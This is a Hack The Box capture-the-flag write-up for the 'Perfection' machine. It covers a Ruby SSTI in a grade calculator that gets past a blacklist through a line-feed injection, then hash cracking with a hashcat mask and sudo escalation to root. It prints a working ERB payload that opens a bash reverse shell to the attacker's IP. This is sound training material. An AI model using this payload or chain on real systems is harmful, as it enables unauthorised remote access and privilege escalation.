HTB
HTB Perfection writeup [20 pts]
Perfection is a easy linux machine which starts with a ruby SSTI in a grade calculator combined with a CRLF injection to bypass restrictions. Once, we have access as susan to the linux machine, it’s possible to see a mail from Tina that tells Susan how to generate her password. Using this information and cracking the hash from a sqlite database we can obtain password for susan and use it to execute any command as root because we belong to the sudo group.
Enumeration
Port scanning
I will start with a basic TCP port scanning with nmap to see which ports are open and see which services are running:
- -sVC: Identifies service and version.
- -p-: scans all the range of ports (1-65535).
- –open: shows only open ports and not filtered or closed.
- -sS: TCP SYN scan that improves velocity because it doesn’t establish the connection.
- –min-rate 5000: Sends 5000 packets per second to improve velocity (don’t do this in a real environment).
- -n: Disables DNS resolution protocol.
- -v: Enables verbose to see which ports are opened while it’s scanning
- -Pn: Disables host discovery protocol (ping).
- -oN targeted: Exports the evidence to a file named “tcpTargeted”.
We can see port 22 for ssh and 80 for http.
Web enumeration
First, looking at the headers, we can see that the server consists of a webrick (ruby), which is something we will need later:
Taking a look to the web, its possible to see that it’s a tool to calculate the total grade in a class:
Clicking “Calculate your weighted grade” and entering data, we can see that the categories are reflected in the page:
I will intercept with burpsuite and send it to repeater to test for ruby SSTI (because it’s ruby), but the characters (remember to urlencode it) are blacklisted:
However, inserting a string and %0a (which is a line feed urlencoded) before the payload works. This is known as CRLF injection:
Access as susan
Now we can insert a payload to gain access to the machine via reverse shell after spawning a nc listener:
SSTI Payload used:
<%= system('bash -c "bash -i >& /dev/tcp/10.10.15.19/443 0>&1"') %>
We successfully gained access as susan:
Now do the common tty trick to having a completely interactive shell, do ctrl+c, ctrl+l, etc:
script /dev/null -c bash
: Spawns a ttyctrl+z
: puts the shell in background for later doing a treatmentstty raw -echo; fg
: give us the shell back againreset xterm
: resets the terminal to give us the bash consoleexport TERM=xterm
: let us do ctrl+l to clean the terminalexport SHELL=bash
: specifies the system that we are using a bash console
And we can see user.txt:
Privilege escalation to root
In the Migration directory, we have a sqlite database where we can extract some hashes:
This hashes are SHA256. However they are not crackable with rockyou:
Something important to take into accounts is that we belong to the sudo group, so if we manage to get susan password, we can execute any command as root:
Looking at the mail of susan, we can see that tina is advising susan that she needs to update his password due to a migration, and we have the format needed:
I will use hashcat to specify the format and try to crack it:
Note: -a 3 is to specify bruteforce mode and ?d is for digits
And we have the password! Now you can execute bash as root and see root.txt:
That’s the machine, hope you liked it! :)